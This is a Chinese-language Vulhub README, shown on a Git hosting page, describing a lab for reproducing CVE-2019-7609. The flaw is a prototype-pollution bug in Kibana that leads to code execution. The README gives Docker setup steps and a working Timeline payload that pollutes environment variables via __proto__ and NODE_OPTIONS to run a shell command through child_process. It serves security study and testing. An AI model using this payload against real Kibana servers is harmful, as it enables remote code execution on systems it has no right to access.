Files
vulhub/kibana/CVE-2019-7609/README.zh-cn.md
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
first commit
2025-09-06 16:08:15 +08:00

1.3 KiB
Raw Blame History

Kibana 原型链污染导致任意代码执行漏洞 (CVE-2019-7609)

Kibana 为 Elassticsearch 设计的一款开源的视图工具。其5.6.15和6.6.1之前的版本中存在一处原型链污染漏洞利用这个漏洞我们可以在目标服务器上执行任意JavaScript代码。

参考链接:

漏洞环境

启动环境前需要先在Docker主机上执行如下命令修改vm.max_map_count配置为262144

sysctl -w vm.max_map_count=262144

之后执行如下命令启动Kibana 6.5.4和Elasticsearch 6.8.6

docker compose up -d

环境启动后,访问http://your-ip:5601即可看到Kibana页面。

漏洞复现

原型链污染发生在“Timeline”页面我们填入如下Payload

.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("/bin/touch /tmp/success");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

成功后再访问“Canvas”页面触发命令/bin/touch /tmp/success,可见/tmp/success已成功创建: